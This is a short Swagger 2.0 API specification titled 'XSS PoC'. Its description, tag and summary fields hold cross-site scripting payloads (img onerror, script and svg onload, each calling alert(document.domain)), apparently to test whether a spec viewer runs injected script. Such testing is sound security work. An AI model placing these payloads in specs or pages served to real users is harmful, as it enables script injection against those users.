swagger: "2.0"
info:
  title: "XSS PoC"
  description: "<img src=x onerror=alert(document.domain)>"
paths:
  /xss:
    get:
      tags:
        - "<script>alert(document.domain)</script>"
      summary: "This is a test"
      description: "<svg onload=alert(document.domain)>"
      responses:
        200:
          description: "Successful XSS PoC"
